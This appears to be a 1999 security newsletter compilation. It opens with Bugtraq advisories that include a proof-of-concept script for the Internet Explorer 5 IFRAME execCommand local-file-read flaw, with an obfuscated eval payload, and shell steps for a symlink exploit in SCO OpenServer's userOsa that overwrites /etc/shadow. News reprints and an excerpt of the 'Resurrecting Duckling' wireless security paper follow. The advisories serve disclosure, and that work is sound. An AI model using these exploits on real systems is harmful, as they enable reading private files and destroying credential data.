              Microsoft Internet Explorer 4.0.1 for Windows 95
                 - Microsoft Windows 95
                 
       Internet Explorer 5 will allow a malicious web page to read the contents
       of local files through a weakness in the IE5 security model. Normally the
       document.execCommand method is restricted from reading and
       returning data on the local machine, however if the method is called
       from within an IFRAME this restriction can be circumvented.          
       
       Georgi Guninski has created a demonstration, available at: 
       http://www.nat.bg/~joro/execcommand.html

       The code is as follows:
       <SCRIPT>
       alert("Create text file c:\\test.txt and it will be read");
       function f()
       {
       I1.focus();
       document.execCommand("selectAll");
       document.execCommand("InsertParagraph",false,">\"STYLE='left:expression(eval(String.fromCharCode(97,61,119,105,110,100,111,119,46,111,112,101,110,40,39,102,105,108,101,58,47,47,99,58,47,116,101,115,116,46,116,120,116,39,41,59,97,108,101,114,116,40,97,46,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,84,101,120,116,41)));'");
       }
      setTimeout('f()',2000);
      </SCRIPT>
      <IFRAME ID="I1" SRC="file://c:/test.txt"></IFRAME>
      
      Microsoft has released patches for IE 4.01 and IE5. The IE 4.01 patch is included as part of
      the IE 4.01 Service Pack 2, available via:

      http://www.microsoft.com/windows/ie/download/windows.htm

      The IE5 patch is available as an individual fix from:

      Intel:
      ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/x86/q243638.exe 

      Alpha:
      ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/Alpha/q243638.exe

      The Microsoft Advisory MS 99-042 notes: "The IE5 patch also includes the
      previously-released fix for the "Download Behavior" vulnerability, discussed in
      http://www.microsoft.com/security/bulletins/ms99-040.asp."
      
      credit
      Posted to Bugtraq on October 11, 1999 by Georgi Guninski
      <joro@nat.bg>.

      reference
       advisory:
               MS99-042: Patch Available for "IFRAME
               ExecCommand" Vulnerability
               (MS)
               http://www.securityfocus.com/templates/advisory.html?id=1788
               
       message:
               IE 5.0 security vulnerability - reading local (and
               from any domain, probably win
               (Georgi Guninski <joro@nat.bg>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=38020E75.7966C579@nat.bg
               
       web page:
               Microsoft Security Bulletin (MS99-042):
               Frequently Asked Questions
               (Microsoft)
               http://www.microsoft.com/security/bulletins/MS99-042faq.asp
               
       web page:
               Q243638: Update Available for "IFRAME
               ExecCommand" Vulnerability in Internet Exp
               (Microsoft)
               http://support.microsoft.com/support/kb/articles/q243/6/38.asp
               
       To: BugTraq
       Subject: IE 5.0 security vulnerability - reading local (and from any domain, probably window spoofing is possible) files using IFRAME and document.execCommand
       Date: Mon Oct 11 1999 14:21:09
       Author: Georgi Guninski
       Message-ID: <38020E75.7966C579@nat.bg>
      
      
      IE 5.0 security vulnerability - reading local (and from any domain,
      probably window spoofing is possible) files using IFRAME and
      document.execCommand
      
      Disclaimer:
      The opinions expressed in this advisory and program are my own and not
      of any company.
      The usual standard disclaimer applies, especially the fact that Georgi
      Guninski
      is not liable for any damages caused by direct or  indirect use of the
      information or functionality provided by this program.
      Georgi Guninski, bears NO responsibility for content or misuse of this
      program or any derivatives thereof.
      
      Description:
      
      Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (suppose Win98 is
      vulnerable)
      allows reading local files, text and HTML files from any domain and
      probably window spoofing (have not tested window spoofing but believe it
      is possible)
      It is also possible in some cases to read files behind fiewall.
      
      Details:
      
      The problem is the combination of IFRAME and document.execCommand.
      Normally, you cannot use execCommand on an IFRAME from another domain.
      But if you do:
      "IFRAME.focus(); document.execCommand" then command will be executed in
      the IFRAME
      (some commands do not work in this way, but some do and that is enough).
      So, we create an IFRAME with SRC="file://c:/test.txt" and inject
      JavaScript code in it. When the
      JavaScript code is executed, it is executed in the security context of
      the IFRAME - the "file:" protocol.
      The injection is done using the "InsertParagraph" command (guess other
      commands will do) which sets the ID of the paragraph.
      But if you place a " in the ID, then a STYLE tag may be inserted also.
      The JavaScript code is injected using the STYLE tag:
      STYLE="left:expression(eval(JSCode))"
      This vulnerability may be exploited using HTML email message or a
      newsgroup posting.
      
      The code is:
      ----------------------------------------------------------------------------------------
      <SCRIPT>
      alert("Create text file c:\\test.txt and it will be read");
      function f()
      {
      I1.focus();
      document.execCommand("selectAll");
      document.execCommand("InsertParagraph",false,">\"STYLE='left:expression(eval(String.fromCharCode(97,61,119,105,110,100,111,119,46,111,112,101,110,40,39,102,105,108,101,58,47,47,99,58,47,116,101,115,116,46,116,120,116,39,41,59,97,108,101,114,116,40,97,46,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,84,101,120,116,41)));'");
      }
      setTimeout('f()',2000);
      </SCRIPT>
      <IFRAME ID="I1" SRC="file://c:/test.txt"></IFRAME>
      ----------------------------------------------------------------------------------------
      
      
      Workaround:
      Disable Active Scripting
      
      Demonstration is available at http://www.nat.bg/~joro/execcommand.html
      
      
      Regards,
      Georgi Guninski
      http://www.nat.bg/~joro
      
      @HWA         
      
78.0  SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      bugtraq id  701
      object      /etc/sysadm.d/bin/userOsa (exec)
      class       Origin Validation Error
      cve         GENERIC-MAP-NOMATCH
      remote      No
      local       Yes
      published   October 11, 1999
      updated     October 13, 1999
 
       
       
      Vulnerable
      
              SCO Open Server 5.0.5
              SCO Open Server 5.0.4
              SCO Open Server 5.0.3
              SCO Open Server 5.0.2
              SCO Open Server 5.0.1
              SCO Open Server 5.0
              
      Under certain versions of SCO OpenServer there exists a symlink
      vulnerability which can be exploited to overwrite any file which is group
      writable by the 'auth' group. The problem in particular is in the the
      /etc/sysadm.d/bin/userOsa executable. When given garbage output the
      program will write out a debug log. However, the program does not
      check to see if it overwriting a currently existing file nor wether it is
      following a symlink. Therefore is it possible to overwrite files with debug
      data which are both in the 'auth' group and are writable by the same
      group. Both /etc/shadow & /etc/passwd fall into this category. If such an
      attack were launched against these files the system would be rendered
      unusable.        
      
      As per Brock Tellier's original posting to Bugtraq:

      scohack:/tmp$ ln -s /etc/shadow.old debug.log
      scohack:/tmp$ /etc/sysadm.d/bin/userOsa
      bah
      connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ
      {Invalid Connect
      Request: bah}}}
      Failed to listen to client
      Failure in making connection to OSA.
      scohack:/tmp$
     
      -----
     
      BEFORE EXPLOIT:
      scohack:/# l /etc/shadow.old
      -rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old
     
      AFTER EXPLOIT (note the file size):
      scohack:/# l /etc/shadow.old
      -rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old
     
      scohack:/# cat /etc/shadow.old
      >>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by
      <PID=11604>
      <<<
      SendConnectFail(connectFail
      {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ
      {Invalid Connect Request: bah}}})
     
      scohack:/#
      
      credit
      This vulnerability was posted to the Bugtraq mailing list
      by "Brock Tellier" <btellier@webley.com> on Mon, 11
      Oct 1999.

      reference
       
       message:
               SCO OpenServer 5.0.5 overwrite /etc/shadow
               (Brock Tellier <btellier@webley.com>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=02e601bf1426$b1043920$3177a8c0@webley
               
       web page:
               Patches and Supplements from SCO
               (SCO)
               http://www.sco.com/support/ftplists/index.html
               
               
       web page:
               SCO Secure Technologies Group
               (SCO)
               http://www.sco.com/security/
               
      
      
       To: BugTraq
       Subject: SCO OpenServer 5.0.5 overwrite /etc/shadow
       Date:Mon Oct 11 1999 02:24:59
       Author: Brock Tellier
       Message-ID: <02e601bf1426$b1043920$3177a8c0@webley>
      
      
      Greetings,
      
      Any user may overwrite any file with group auth (i.e. /etc/shadow,
      /etc/passwd) using /etc/sysadm.d/bin/userOsa.  Note that this will not
      change the permissions of the file or allow for the user to input a
      passwd entry string into these files, it will simply clobber the contents
      of the file with debug output.
      
      When userOsa recieves invalid input, it generates a log file called
      "debug.log" in the PWD.  This file is created with group auth
      permissions,does not check for this file's existence, and will follow
      symlinks. Thus the exploit is as follows:
      
      
      scohack:/tmp$ ln -s /etc/shadow.old debug.log
      scohack:/tmp$ /etc/sysadm.d/bin/userOsa
      bah
      connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect
      Request: bah}}}
      Failed to listen to client
      Failure in making connection to OSA.
      scohack:/tmp$
      
      -----
      
      BEFORE EXPLOIT:
      scohack:/# l /etc/shadow.old
      -rw-rw----   1 root     auth          26 Oct 11 20:08 /etc/shadow.old
      
      AFTER EXPLOIT (note the file size):
      scohack:/# l /etc/shadow.old
      -rw-rw----   1 root     auth         177 Oct 11 20:10 /etc/shadow.old
      
      scohack:/# cat /etc/shadow.old
      >>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <PID=11604>
      <<<
      SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ
      {Invalid Connect Request: bah}}})
      
      scohack:/#
      
      Brock Tellier
      UNIX Systems Administrator
      
      @HWA         
      
79.0  ARE VIRUSES Y2K COMPLIANT?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by Thejian, Thursday 21st October 1999 on 11:30 am CET
      As if there isn't enough uncertainty about Y2K, computer virus experts advise extra
      care to inoculate before the century turns, lest a virus take advantage of Y2K chaos.
      Their concern? Not only viruses targeting y2k, but also the new year awakening
      dormant old viruses. A millennium virus may go unnoticed in the Y2K confusion. A
      virus set to activate as the calendar rolls over might cause damage that people will
      blame on Y2K, which would allow the virus to spread more quickly, say some
      experts. 
      

      Are Viruses Y2K
      Compliant?

      Be ready: Virus authors may target Y2K, or the
      new year may awaken dormant old viruses.

      by Charles Bermant, special to PC World 
      October 20, 1999, 6:30 p.m. PT 

      As if there isn't enough uncertainty about Y2K,
      computer virus experts advise extra care to inoculate
      before the century turns, lest a virus take advantage of
      Y2K chaos. 

      Their concern? A millennium virus may go unnoticed in
      the Y2K confusion. A virus set to activate as the
      calendar rolls over might cause damage that people will
      blame on Y2K, which would allow the virus to spread
      more quickly, say some experts. 

      On the other hand, virus authors are an egotistical
      bunch who may not want to share their 15 minutes of
      fame with another media event like the new millennium.


      Virus Opportunity

      "We expect there will be some kind of virus attack,"
      says Sal Viveros, Network Associates group marketing
      manager for the Total Virus Defense Product, which
      includes McAfee VirusScan. "When systems fail,
      administrators might not think of a virus and head off on
      a wild goose chase in order to solve the problem." 

      Network Associates has already found six viruses
      keyed to Y2K, Viveros says. He expects many more
      are set to deliver their payload either January 1 or on
      January 3, when people return to work. 

      Antivirus vendor Panda Software sounded the alarm
      early. Its Web site warns that many viruses rely on
      date stamps to operate, and it's uncertain how they'll
      behave in 2000. 

      "Y2K has an unpredictable effect, and you can't just
      leave it to chance," says Pedro Bustamante, executive
      director of Panda's U.S. office. "A lot of people have
      outdated virus [protection] programs, and this gives
      them a false sense of security." 

      Like the potential effect of Y2K on banking, power, and
      software, no one can say for sure what viruses will do.
      Perhaps virus authors will take the opportunity to
      create a monumental meanie. 

      "There might be a few new viruses written that the
      author hopes will not be noticed in the general
      background noise of champagne corks popping," says
      Ross M. Greenberg, an author of early antivirus
      products and former manager of MSN's Computing
      Central's Safe Computing Forum. "But, generally, a
      virus author wants their little creation to be noticed.
      There would be no delight in their creation's damage
      not being credited to whatever name they hide behind if
      Y2K took the credit for it." 

      Viveros disagrees, saying that Y2K is the ultimate
      challenge for a virus author. 

      "What better time to unleash a virus than when
            everyone is watching?" Viveros asks. 
            
      @HWA
      
80.0  COMPUTER SECURITY AT CENTER OF DOE PROBLEMS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by Thejian, Thursday 21st October 1999 on 11:00 am CET
      The former director of the Energy Department's Office of Safeguards and Security
      today outlined for Congress years of cybersecurity problems at the nation's nuclear
      weapons laboratories, claiming officials were aware of ongoing espionage but failed to
      do anything about it. "A variety of computer security tools and techniques, such as
      encryption devices, firewalls and disconnect features, are required by policy; however,
      these policies were frequently ignored." Federal Computer Week. 
      
      OCTOBER 20, 1999 . . . 18:06 EDT 


      Computer security at center of DOE problems,
      top officials say
 
      BY DANIEL VERTON (dan_verton@fcw.com)
 
      The former director of the Energy Department's Office of Safeguards and
      Security today outlined for Congress years of cybersecurity problems at the
      nation's nuclear weapons laboratories, claiming officials were aware of
      ongoing espionage but failed to do anything about it.
 
      Edward McCallum, the former chief of DOE security who is now detailed to
      the Defense Department as the Pentagon's acting director of the Combating
      Terrorism Technology Support Office, said DOE officials "knew our greatest
      secrets were being stolen and . . . did nothing about it."
 
      McCallum, who testified today before the House Armed Services
      Committee's Military Procurement Subcommittee, said efforts by his office
      dating to 1995 to enhance DOE cybersecurity met with "significant laboratory
      resistance" and ultimately failed. "Several laboratories and their program
      assistant secretaries in Washington, [D.C.], believed that protection, such as
      firewalls and passwords, was unnecessarily expensive and a hindrance to
      science," McCallum said. "A variety of computer security tools and
      techniques, such as encryption devices, firewalls and disconnect features, are
      required by policy; however, these policies were frequently ignored."
 
      Retired Air Force Gen. Eugene Habiger, director of DOE's Office of Security
      and Emergency Operations, told committee members that during his review of
      DOE security measures, under way since he took the post in June, he
      discovered that the department had lost its focus on security. "By-products of
      this organizational dysfunction and lack of focus included . . . a lack of
      attention to our cybersecurity practices in a world of increased computer
      hacking and cyberterrorism," said Habiger.
 
      McCallum identified the lack of protection afforded classified information
      systems and the ease with which that information could be transferred to and
      from classified systems as one of the DOE's primary security weaknesses.
      "Something as simple as using different size floppy disks between classified
      and unclassified systems was rejected as unnecessary," he said. "Indeed, I
      believe we are sitting at the center of the worst spy scandal in our nation's
      history."
 
      Habiger also laid blame on Congress' failure to fund additional cybersecurity
      initiatives requested by DOE in the department's fiscal 2000 budget proposal.
      "We have valid requirements in the area of cybersecurity to buy hardware,
      encryption equipment and to train our system administrators," Habiger said.
      However, "simply stated, we have been given a mandate but not the additional
      resources to accomplish that mandate."
     
     @HWA
     
81.0  US REVISITS SOURCE CODE LIMITS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by Thejian, Wednesday 20th October 1999 on 11:50 pm CET
      The Clinton administration is considering relaxing export limits on computer source
      code for data scrambling programs, in a possible move acknowledging the growing
      importance of Linux, a top export official said Tuesday. Undersecretary of Commerce
      William Reinsch said the administration had originally intended to maintain current
      export limits on source code, or instructions written by a computer programmer that
      can be compiled into a computer program. Following announcements by the White
      House on the relaxation of pre-compiled crypto, the restrictions on source code is
      under review now too. Wired. 
      
      US Revisits Source Code Limits
      Reuters

      3:00 a.m. 20.Oct.99.PDT
      The Clinton administration is considering relaxing export limits on computer source
      code for data scrambling programs, in a possible move acknowledging the growing
      importance of Linux, a top export official said Tuesday. 

      Undersecretary of Commerce William Reinsch said the administration had
      originally intended to maintain current export limits on source code, or
      instructions written by a computer programmer that can be compiled into a
      computer program.

      But after the administration announced it would significantly relax many of its limits
      on already compiled computer encryption programs, high-tech companies
      complained that retaining the source code limit was unworkable, Reinsch said in
      a telephone interview. 

      "We are now reviewing that," Reinsch said. "It's on the table as [an] area where
      we might make a revision." 

      Revised encryption export rules will be released by 15 December, he said, with
      any possible changes for source code export likely included at that time. 

      Encryption, which uses mathematical formulas to scramble information and
      protect it from prying eyes, is now included in everything from Web browsers
      and email programs to cable television set-top boxes and handheld computers. 

      Traditionally, software companies sold finished programs but kept the source
      code underlying their programs a tightly guarded secret. Microsoft, for example,
      has never published the source code underlying its Windows operating system. 

      More recently, a movement of "open source" software has gained momentum,
      including a version of the Unix operating system developed by Linus Torvalds and
      known as Linux. 
      
      Source code of such programs is made freely available to anyone, usually over
      the Internet. 

      But the export rules consider posting source code on the Internet, where
      people in other countries can download it, a form of export. That creates problems
      for US programmers that want to include encryption features for Linux or other
      "open source" programs. 

      A three-judge panel of the Ninth US Court of Appeals ruled in May that the source
      code export limits were a violation of the First Amendment's free speech
      guarantee, but the decision is being reviewed by the full appeals court. 

      Computer science professor Daniel Bernstein filed the lawsuit so he could
      post an encryption program he had written on the Internet. 

      A change in the export rules could render
      the case moot. 

      Copyright 1999 Reuters Limited. 
      
      @HWA
     
82.0  SECURITY FOR AD-HOC WIRELESS NETWORKS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by Thejian, Wednesday 20th October 1999 on 11:30 pm CET
      The Resurrecting Duckling is a security policy model which describes secure
      transient association of a device with multiple serialised owners. Basically a nice
      description on some of the security issues in wireless networks and ways to battle
      those. Cambridge paper. 
      
      The Resurrecting Duckling:
      Security Issues for Ad-hoc Wireless Networks

      Frank Stajano and Ross Anderson 

      In the near future, many personal electronic devices will be able to communicate
      with each other over a short range wireless channel. We investigate the principal
      security issues for such an environment. Our discussion is based on the concrete 
      example of a thermometer that makes its readings available to other nodes over 
      the air. Some lessons learned from this example appear to be quite general to 
      ad-hoc networks, and rather different from what we have come to expect in more
      conventional systems: denial of service, the goals of authentication, and the 
      problems of naming all need re-examination. We present the resurrecting duckling
      security policy model, which describes secure transient association of a device 
      with multiple serialised owners. 

      This research was first presented at the 7th International Workshop on Security
      Protocols, held in Cambridge, UK, from 1999-04-19 to 1999-04-21. The proceedings
      will be published by Springer-Verlag in the Lecture Notes for Computer Science 
      series. The full text of the paper is available as PDF (114 KB), gzipped PostScript
      (127 KB) or HTML (35 KB). 

      A few months later, an abridged and updated version was presented at the 3rd AT&T
      Software Symposium, held in Middletown, NJ, USA, on 1999-10-20. The text of this 
      version is available as PDF (70 KB) or gzipped PostScript (104 KB). 
      
      http://www.cl.cam.ac.uk/~fms27/papers/duckling.pdf
      http://www.cl.cam.ac.uk/~fms27/papers/duckling.ps.gz
      http://www.cl.cam.ac.uk/~fms27/duckling/duckling.html
      http://www.cl.cam.ac.uk/~fms27/papers/duckling-attss99.pdf
      http://www.cl.cam.ac.uk/~fms27/papers/duckling-attss99.ps.gz
      
      The Resurrecting Duckling: 
      Security Issues for Ad-hoc Wireless Networks
      
      Frank Stajano (1,2) and Ross Anderson (1)
      
      (1) 
      University of Cambridge Computer Laboratory,
      New Museums Site, Pembroke Street, Cambridge CB2 3QG, UK
      name.surname@cl.cam.ac.uk
      
      (2)
      AT&T Laboratories Cambridge,
      24a Trumpington Street, Cambridge CB2 1QA, UK
      fstajano@uk.research.att.com 
      
      Abstract
      
      In the near future, many personal electronic devices will be able to communicate with each other over a short range wireless channel. We investigate the principal security issues for such an environment. Our discussion is based on the concrete example of a
      thermometer that makes its readings available to other nodes over the air. Some lessons learned from this example appear to be quite general to ad-hoc networks, and rather different from what we have come to expect in more conventional systems: denial of
      service, the goals of authentication, and the problems of naming all need re-examination. We present the resurrecting duckling security policy model, which describes secure transient association of a device with multiple serialised owners. 
      
      
      
      Introduction
      
      The established trend in consumer electronics is to embed a microprocessor in everything-cellphones, car stereos, televisions, VCRs, watches, GPS (Global Positioning System) receivers, digital cameras-to the point that most users have already lost track of the
      number of items they own that contain one. In some specific environments such as avionics, electronic devices are already becoming networked; in others, work is underway. Medical device manufacturers want instruments such as thermometers, heart monitors
      and blood oxygen meters to report to a nursing station; consumer electronics makers are promoting the Firewire standard [firewire] for PCs, stereos, TVs and DVD players to talk to each other; and kitchen appliance vendors envisage a future in which the oven
      will talk to the fridge, which will reorder food over the net. 
      
      We envisage that, in the near future, this networking will become much more general. The next step is to embed a short range wireless transceiver into everything; then many gadgets can become more useful and effective by communicating and cooperating with
      each other. A camera, for example, might obtain the geographical position and exact time from a nearby GPS unit every time a picture is taken, and record that information with the image. At present, if the photographer wants to record a voice note with the
      picture, the camera must incorporate digital audio hardware; in the future, the camera might let him speak into his digital audio recorder or cellphone. Each device, by becoming a network node, may take advantage of the services offered by other nearby devices
      instead of having to duplicate their functionality. 
      
      Ad-hoc Wireless Networks
      
      This vision of embeddable wireless connectivity has been in development for several years at AT&T Laboratories Cambridge in the context of the Piconet [piconet97] project and is also being pursued, although with emphasis on different aspects, by several
      other groups including HomeRF [homerf-www,homerf98], IrDA [irda-www] (which uses infrared instead of radio) and Bluetooth [bluetooth-www,bluetooth98]. 
      
      Everyone-including potential users-knows that wireless networking is more prone to passive eavesdropping attacks. But it would be highly misleading to take this as the only, or even the main, security concern. 
      
      In this paper we investigate the security issues of an environment characterised by the presence of many principals acting as network peers in intermittent contact with each other. To base the discussion on a concrete example we shall consider a wireless
      temperature sensor. Nearby nodes may be authorised to request the current temperature, or to register a "watch'' that will cause the thermometer to send out a reading when the temperature enters a specific range. We wish to make our thermometer useful in the
      widest range of environments including environmental monitoring, industrial process control and medicine. 
      
      We will therefore consider how we can enable our thermometer to support all the security properties that might be required, including confidentiality, integrity (and its close relative authenticity) and availability. Contrary to academic tradition, however, we
      shall examine them in the opposite order, as this often (and certainly in our case) reflects their actual importance. First, however, we have to mention some of the resource constraints under which such networks operate. 
      
      System constraints
      
      The three main constraints on Piconet, and on similar systems which support ad-hoc networks of battery operated personal devices, are as follows: 
      
        [Peanut CPU:] the computing power of the processor in the node is typically small, so large computations are slow. 
      
        [Battery power:] the total energy available to the node is a scarce resource. The node likes to go to sleep whenever possible. It is not desirable to use idle time to perform large computations in the background. 
      
        [High latency:] to conserve power, nodes are off most of the time and only turn on their receiver periodically. Communicating with such nodes involves waiting until they next wake up. 
      
      The consequence of those constraints is that, while strong symmetric cryptography is feasible, modular arithmetic is difficult and so is strong asymmetric cryptography. Where a peanut node (e.g. the one embedded in a camera) interacts with a more powerful one
      (e.g. the one embedded in a mobile phone or laptop), one may use techniques such as low exponent RSA, with the protocols designed so that the peanut node sticks to the cheap operations of encryption and verification while avoiding the expensive ones of
      decryption and signature. 
      
      More generally, where there is a trade-off between security and (say) battery life, we may want to let the user control this. For example, if our thermometer is used to drive a wall display in someone's living room that shows the outside temperature, then the
      owner is unlikely to opt for validated and encrypted communication if this means that he must change the battery every month instead of once a year. 
      
      One challenge is to integrate this flexibility in the system without introducing major architectural holes of the sort that would allow the attacker, too, to turn off security at will. 
      
      
      
      Availability
      
      Availability means ensuring that the service offered by the node will be available to its users when expected. In most non-military scenarios, this is the security property of greatest relevance for the user. All else counts little if the device cannot do what it should. 
      
      Radio jamming
      
      In the traditional threat model-derived from the military-an attacker can deny service to the nodes in a given area by jamming the radio frequencies they use. Traditional defences include spread spectrum and frequency hopping, both of which force the attacker to
      jam a wider frequency band and thus use more power. We will revisit them briefly in section * below. However such concerns are of less relevance to the commercial world, where such attacks are dealt with by complaining to the authorities and having the
      operator of the jamming station arrested. 
      
      The novel and interesting service denial threat is different, and concerns battery exhaustion. 
      
      Battery exhaustion
      
      A malicious user may interact with a node in an otherwise legitimate way, but for no other purpose than to consume its battery energy. Battery life is the critical parameter for many portable devices, and many techniques are used to maximise it; in Piconet, for
      example, nodes try to spend most of the time in a sleep mode in which they only listen for radio signals once in a while (the period can be set from a few seconds to several minutes). In this environment, power exhaustion attacks are a real threat, and are much
      more powerful than better known denial of service threats such as CPU exhaustion; once the battery runs out the attacker can stop and walk away, leaving the victim disabled. We call this technique the sleep deprivation torture attack. 
      
      For any public access server, there is necessarily a tension between the contrasting goals of being useful to unknown users and not succumbing to vandals. Whereas some applications can restrict access to known principals, in others (such as web servers and
      name servers) this is infeasible since the very usefulness of the service comes from its being universally available. 
      
      If a server has a primary function (such as sending the outside temperature to the meteorological office every hour) and a distinct auxiliary function (such as sending the current temperature to anyone who requests it) then these functions can be prioritised; a
      reservation mechanism can ensure that the higher priority use receives a guaranteed share of the resource regardless of the number of requests generated by the lower priority uses. (The highest priority use of all may be battery management: if one can estimate
      fairly accurately the amount of usable energy remaining, then the service can be monitored and managed provided that the process does not itself consume too much of the resource it is intended to conserve.) 
      
      
      
      Authenticity
      
      To whom can a principal talk?
      
      In some applications our thermometer will broadcast its temperature readings, but in general it will only send them to recipients who have been authorised in some way. For example, in a hospital, it might be authorised to send temperature readings to any
      doctor's palmtop computer or any nursing station. But it might also be required to restrict transmission (e.g. of the temperature of a celebrity) to a particular station or device. 
      
      The usual authorisation mechanisms (which turn out to be the least interesting in this case) involve a centralised system administrator. This may be implemented as access control lists (the administrator tells the thermometer who is authorised) or capabilities (the
      administrator gives some principals a signed certificate which they present to the thermometer when they want a reading). However, the ad-hoc network environment poses a fundamental new problem: the absence of an online server. 
      
      Interactions with the administrator after the thermometer has been manufactured (or personalised by the institution that owns it) may be expensive or time-consuming, as they may entail establishing a network connection to a central server (perhaps using
      gossiping via intermediate nodes), or bringing a management device physically close to each affected node. In the particular case of a thermometer, the device might be calibrated every six months, at which time new security state can be loaded; however, rapid
      changes may be too expensive for a central administrator to make regularly. 
      
      It follows that the length of any validity period (whether for certificates or access control lists) will be a trade-off between timeliness and convenience. But relying on expiration dates imposes on the nodes the extra cost of running a secure clock-otherwise the
      holder of an expired certificate might reset a node's clock to a time within the validity period. As many Piconet nodes would not normally have an onboard clock, the classical approach to authentication is suspect. Thankfully, there is a better way. 
      
      Secure transient association
      
      The novel and interesting authentication problem in ad-hoc networks of wireless devices is that of secure transient association. If a householder owns a device, say a universal remote control, that lets her control various other devices in her home (such as hi-fi
      and television components, the heating system, lights, curtains and even the locks and burglar alarm) then she will need to ensure that a new device she buys from the shop will obey her commands, and not her neighbour's. She will want to be assured that a
      burglar cannot take over the heat sensing floodlight in the garden, or unlock the back door, just by sending it a command from a remote control bought in the same shop. 
      
      As well as being secure (whatever that means), the association between the controller and the peripheral must also be transient. When a householder resells or gives away her television set or hi-fi or fridge, it will have to obey another controller; when her
      controller breaks down (or she decides to replace it or upgrade its operating system), she must be able to regain control of all the gadgets she already owns. 
      
      A central authentication service is possible for expensive consumer durables; most governments run such services for houses and cars. But there is no prospect that this will be extended to all durable consumer goods; the UK government abandoned dog
      licensing some years ago as uneconomic. In any case, there would be very grave civil liberties objections to the government maintaining lists of all PCs, hi-fis and DVD players in the country; the outcry over the Pentium III processor ID indicates the likely level of
      political resistance. Even the existing central services stop short of managing keys; the replacement of car keys is left to the motor trade, while house locks are completely uncontrolled. So it is desirable that key management be performed locally: the last thing we
      want is to impose an expensive and unpopular central solution. Yet it would be nice if we could still provide some means of making a stolen DVD player harder to resell. 
      
      Another insight comes from scenarios where we have a pool of identical devices, such as a bowl of disinfectant containing ten thermometers. The doctor does not really care which thermometer she gets when she picks one up, but she does care that the one her
      palmtop talks to is the same one she is holding and not any other one in the bowl or nearby in the ward. 
      
      Many more potential applications of wireless devices require establishing a secure transient association between two principals (typically, but not necessarily, a user and a peripheral). For example, there has been significant interest in the possibility of a police
      pistol that can only fire when held by the officer to whom it was issued, who for this purpose might be wearing a very short range radio ring: at present, in the USA, a large number of the firearm injuries sustained by policemen come from stolen police guns.
      Similar considerations might apply to more substantial weapon systems, such as artillery, that might fall into enemy hands. 
      
      The "resurrecting duckling'' security policy
      
      A metaphor inspired by biology will help us describe the behaviour of a device that properly implements secure transient association. 
      
      As Konrad Lorenz beautifully narrates [Lorenz], a duckling emerging from its egg will recognise as its mother the first moving object it sees that makes a sound, regardless of what it looks like: this phenomenon is called imprinting. Similarly, our device (whose
      egg is the shrink-wrapped box that encloses it as it comes out of the factory) will recognise as its owner the first entity that sends it a secret key. As soon as this `ignition key' is received, the device is no longer a newborn and will stay faithful to its owner for the
      rest of its life. If several entities are present at the device's birth, then the first one that sends it a key becomes the owner: to use another biological metaphor, only the first sperm gets to fertilise the egg. 
      
      We can view the hardware of the device as the body, and the software (particularly the state) as the soul. As long as the soul stays in the body, the duckling remains alive and bound to the same mother to which it was imprinted. But this bond is broken by death:
      thereupon, the soul dissolves and the body returns in its pre-birth state, with the resurrecting duckling ready for another imprinting that will start a new life with another soul. Death is the only event that returns a live device to the pre-birth state in which it will
      accept an imprinting. We call this process reverse metempsychosis. Metempsychosis refers to the transmigration of souls as proposed in a number of religions; our policy is the reverse of this as, rather than a single soul inhabiting a succession of bodies, we
      have a single body inhabited by a succession of souls[Note: Prior art on this technique includes Larry Niven's science fiction novel A World Out of Time (1977) in which convicted criminals have their personalities "wiped'' and their bodies recycled.]. 
      
      With some devices, death can be designed to follow an identifiable transaction: our medical thermometer can be designed to die (and lose its memory of the previous key and patient) when returned to the bowl of disinfectant. With others, we can arrange a
      simple timeout, so that the duckling dies of old age. With other devices (and particularly those liable to be stolen) we will arrange that the duckling will only die when so instructed by its mother: thus only the currently authorised user may transfer control of the
      device. In order to enforce this, some level of tamper resistance will be required: assassinating the duckling without damaging its body should be made suitably difficult and expensive. 
      
      In some applications we may need to be able to recover from circumstances in which the legitimate user loses the shared secret (e.g. the password is forgotten or the remote control is broken beyond repair). To be able to regain control of the duckling, one
      should allow for escrowed seppuku: someone other than the mother, such as the manufacturer, holds the role of Shogun with a master password that can command the device to commit suicide. 
      
      In other applications, only part of the duckling's soul should perish. In fact, our thermometer will typically be calibrated every six months by the hospital's (or manufacturer's) technician, and the calibration information must not be erased along with the patient data
      and user key when the device is disinfected, but only when it is plugged into a calibration station. So we may consider the device to be endowed with two souls-the calibration state and the user state-and a rule that the latter may not influence the former. So our
      resurrecting duckling security policy may be combined with multilevel security concepts (in fact, "multilevel secure souls'' are a neat application of the Biba integrity policy model [Biba1975]). 
      
      Imprinting
      
      During the imprinting phase, as we said, a shared secret is established between the duckling and the mother. Again, we might think that this is easy to do. If at least one of the two principals involved can perform the expensive public key operations (decrypt and
      sign), the other device then simply generates a random secret and encrypts it under the public key of the powerful device from which it gets back a signed confirmation. 
      
